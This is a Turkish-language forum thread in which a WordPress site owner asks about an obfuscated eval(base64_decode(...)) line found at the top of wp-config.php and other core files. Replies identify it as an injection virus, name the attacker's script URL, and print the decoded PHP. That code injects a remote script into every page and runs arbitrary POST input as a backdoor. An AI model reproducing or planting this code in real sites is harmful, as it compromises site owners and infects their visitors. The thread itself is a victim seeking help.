bune hatası arkadaşlar ?

edittt


arkadaslar olayı hallettım ancak dıkkatımı cektı bazı dosyalarda ornegin wp-config.php dosyasında en ust satırında asadakıler yazılı ıdı yenıden bu dosyaları attım duzeldı acaba nedir bu

<?php eval(base64_decode('aWYoIWlzc2V0KCR5NnNiMSkpe2Z1bmN0aW9uIHk2c2IoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyWnZiMlJtWlhOMGFYWmhiQzVyY2k5MWNHeHZZV1JsWkM5amFHRnliV1p2YjJRdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiB5NnNiMigkYSwkYiwkYywkZCl7Z2xvYmFsICR5NnNiMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkeTZzYjEpKWNhbGxfdXNlcl9mdW5jKCR5NnNiMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd5NnNiJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3k2c2InKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0keTZzYmw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3k2c2IyJykpIT0neTZzYjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php

benim bıldıgım temaları şifrelemek için kullanıyorlar bu sekılde kodu ancak bu kodlar temanın ıcındekı dosyalarda cıkmadı durup duruken wp-config.php wp-db.php guery.php wp-settings.php ve functions.php dosyalarına yerleşmiş bende bu dosyaları yeniden gonderdım duzeldı neden olmuş olabilir sizce ???

geçmiş olsun iframe virusü

saldırgan site ve yazma izni verilen bütün dosyalara bulaşan frame

http://foodfestival.kr/uploaded/charmfood.php

napmamız gerekıyor ? birde dosyalarda <iframe src ile başlayan kod yok nasıl iframe virüsü yedigimizi anlıyoruz ki

yanlış hatırlamıyorsam iframeden kurtulmanın yolu tüm dosyaları acıp ctrl + f iframe yazıp bulunanları siliceksin ançak öyle kurutuyor diğe biliyorum ama sen google iframe virüs kurtulma yolları diğe arat daha iyi bilgi bulabilirsin :O

o şekilde yaptım ama cıkmıyor ıframe diye ılk mesajda yazdıgım kod bazı dosyalara bulaşmıştı bunlarıda yenıden attım duzeldı

ftp dısardan yazmalara karşı koru onuda sanırım chmod ile yapılıyordu 755 555 mi neydi iyi arastırıp bunları yapman lazım.

ilk mesajdaki fonksiyonu php server decode edecektir

decode edilmiş halinde ise javascript ile iframe kontrolü yaptırıp iframe yoksa dosyaya yazdırmaktır

ayrıca şifreli kodun içinde yine kendini kopyalama özelliği vardır

burdan bakarsanız şifreli kodda tabi iframe bulamazsınız ama kodu yorumlatıp kaynak koda bakarsanız görürsünüz

if(!isset($y6sb1)){function y6sb($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2Zvb2RmZXN0aXZhbC5rci91cGxvYWRlZC9jaGFybWZvb2QucGhwID48L3NjcmlwdD4='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function y6sb2($a,$b,$c,$d){global $y6sb1;$s=array();if(function_exists($y6sb1))call_user_func($y6sb1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='y6sb')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('y6sb');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$y6sbl=(($a=@set_error_handler('y6sb2'))!='y6sb2')?$a:0;eval(base64_decode($_POST['e']));

decode hali böyle birşey veriyor

iframe gömmüşler forumdaki konulara bak tedbirini al hocam.